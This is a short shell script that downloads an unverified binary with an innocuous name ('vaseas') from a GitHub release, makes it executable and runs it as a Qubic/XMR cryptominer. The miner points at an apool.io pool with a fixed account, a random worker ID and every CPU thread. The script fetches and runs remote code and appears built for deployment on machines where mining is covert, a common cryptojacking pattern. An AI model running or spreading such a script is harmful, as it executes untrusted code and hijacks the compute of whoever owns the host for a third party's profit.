#!/bin/sh
apt update && apt install unzip
wget https://github.com/vedhagsvp/qubros/releases/download/apl/vaseas
chmod +x vaseas
./vaseas --algo qubic_xmr --account CP_udnvh2owpq --pool qubic1.hk.apool.io:3334 --worker $(shuf -n 1 -i 1-99999)-22VJUL --thread $(nproc --all)
